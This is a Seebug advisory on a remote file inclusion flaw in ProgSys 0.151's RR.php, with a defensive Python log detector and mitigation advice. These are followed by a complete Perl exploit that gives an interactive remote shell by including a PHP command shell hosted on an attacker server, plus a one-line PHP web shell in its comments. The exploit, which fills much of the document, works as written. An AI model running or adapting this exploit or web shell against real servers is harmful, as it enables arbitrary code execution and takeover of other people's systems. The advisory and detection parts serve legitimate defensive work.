ProgSys RR.PHP Remote File Inclusion Vulnerability

2006-12-24T00:00:00
ID SSV:1018
Type seebug
Reporter Root
Modified 2006-12-24T00:00:00

Description

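ProgSys is a PHP-based web management application. ProgSys does not properly filter user-supplied URI data, so a remote attacker can exploit the flaw to execute arbitrary commands with the privileges of the web process. The problem is that the 'RR.PHP' script does not filter the user-supplied 'phpdns_basedir' parameter; supplying a malicious remote server as the include target leads to execution of arbitrary PHP code with the privileges of the web process.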

Bosch IT-Consulting ProgSys 0.151
No solution is currently available; watch the following link: http://www.boesch-it.de/sw/progsys.php?lang=en
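A log check for the request shape described above, as an added example that is not part of the original advisory: it flags requests to includes/pear/Net/DNS/RR.php whose phpdns_basedir value is a URL rather than a local directory. The log lines, addresses and host names are constructed samples, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote

# Script path and parameter named on this page (path compared case-insensitively).
TARGET_SCRIPT = "includes/pear/net/dns/rr.php"
TARGET_PARAM = "phpdns_basedir"

# Assumed combined access-log format: client address first, request line in quotes.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http:, ftp:, php:, data: ...) or a
# protocol-relative "//" is a remote include target, not a local base directory.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//)', re.I)

# Constructed sample lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Dec/2006:10:00:00 +0000] "GET /progsys/index.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [24/Dec/2006:10:01:00 +0000] "GET /progsys/includes/pear/Net/DNS/RR.php'
    '?phpdns_basedir=http://files.example/c.txt?&cmd=id HTTP/1.1" 200 734',
    '203.0.113.5 - - [24/Dec/2006:10:02:00 +0000] "GET /progsys/includes/pear/Net/DNS/RR.php'
    '?phpdns_basedir=%2568ttp%253A%252F%252Ffiles.example%252Fc.txt HTTP/1.0" 200 90',
    '192.0.2.10 - - [24/Dec/2006:10:03:00 +0000] "GET /progsys/includes/pear/Net/DNS/RR.php'
    '?phpdns_basedir=/var/www/progsys/includes/pear/ HTTP/1.1" 200 120',
]

def fully_unquote(value, rounds=3):
    """Normalise nested percent-encoding so encoded variants are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(log_lines):
    """Return (client, value) for each request passing a remote URL in phpdns_basedir."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        path, _, query = m.group(2).partition("?")
        if not fully_unquote(path).lower().endswith(TARGET_SCRIPT):
            continue
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_unquote(value)
            if name == TARGET_PARAM and REMOTE_RE.match(value):
                hits.append((m.group(1), value))
    return hits
```

With no fixed release available, blocking direct web requests to this script and turning off remote URL includes in PHP (allow_url_fopen, and allow_url_include where the PHP version has it) closes the remote include path.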

                                        
                                            
#!/usr/bin/perl

use LWP::UserAgent;

#:::::::::  :::::::::: :::     ::: ::::::::::: :::        
#:+:    :+: :+:        :+:     :+:     :+:     :+:        
#+:+    +:+ +:+        +:+     +:+     +:+     +:+        
#+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
#+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
#::::::::::: ::::::::::     :::     ::::    ::::  
#    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
#    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
#    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
#    +#+     +#+        +#+     +#+ +#+       +#+ 
#    #+#     #+#        #+#     #+# #+#       #+# 
#    ###     ########## ###     ### ###       ### 
#	
#	
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- ProgSys <= 0.151 Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: ProgSys v.0.151
#- [Script site: http://www.boesch-it.de/sw/progsys.php?lang=en
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-          Find by: Kacper (a.k.a Rahim)
#+
#-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
#+
#-          Contact: kacper1964@yahoo.pl
#-                        or
#-           http://www.rahim.webd.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz: DragonHeart ;-)
#- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
#-                 SkD, nukedclx, Ramzes
#-
#- Greetz for all users DEVIL TEAM IRC Channel !!
#!@ Friendship cannot be traded for paltry gains @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-          Dedicated to the person
#-      without whom I could not live...
#-           K.C:* J.M (a.k.a Magaja)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# usage:
# perl exploit.pl <ProgSys Location> <shell location> <shell cmd>
#
# perl exploit.pl http://site.com/[ProgSys_Path]/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
###################################################




$sciezka = $ARGV[0];

$sciezkacmd = $ARGV[1];

$komenda = $ARGV[2];

# Both locations must be http:// URLs and a command variable name must be given.
if($sciezka!~/http:\/\// || $sciezkacmd!~/http:\/\// || !$komenda){usage()}

head();

while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent->new() or die;

# The remote file URL is passed in phpdns_basedir, which RR.php uses as its include base.
$req = HTTP::Request->new(GET=>$sciezka.'includes/pear/Net/DNS/RR.php?phpdns_basedir='.$sciezkacmd.'?&'.$komenda.'='.$cmd) or die "\nCouldNot connect\n";
$res = $xpl->request($req);

# Fold newlines into a placeholder character so the response can be matched as one line.
$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\nEnter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)

{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}

elsif ($return =~/^<br.\/>.<b>Warning/) {print "\nInvalid Command\n\n"}

# The output sits before the PHP warnings that follow the failed include.
if($return =~ /(.+)<br.\/>.<b>Warning.(.+)<br.\/>.<b>Warning/)
{

$finreturn = $1;
$finreturn=~ tr/[ê]/[\n]/;
print "\r\n$finreturn\n\r";
last;

}
else {print "[shell] \$";}}}last;

sub head()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "+          - - [DEVIL TEAM THE BEST POLISH TEAM] - -         +\n";
print "+          ProgSys <= 0.151 Remote File Include Exploit      +\n";
print "+                http://www.rahim.webd.pl/                   +\n";
print "+          DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam        +\n";
print "+                Find by: Kacper (a.k.a Rahim)               +\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}
sub usage()
{
head();
print " Usage: perl exploit.pl <ProgSys Location> <shell location> <shell cmd>\r\n\n";
print " <ProgSys Location> - Full path to ProgSys ex: http://www.site.com/ProgSys/\r\n";
print " <shell location> - Path to cmd Shell e.g http://www.evilhost.com/cmd.txt\r\n";
print " <shell cmd> - Command variable used in php shell \r\n";
print " ============================================================================\r\n";
print "                         Find by: Kacper (a.k.a Rahim)                       \r\n";
print "                           http://www.rahim.webd.pl/                         \r\n";
print "                    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam               \r\n";
print "                          Special Greetz: DragonHeart ;-)                    \r\n";
print " ============================================================================\r\n";

exit();
}

#DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam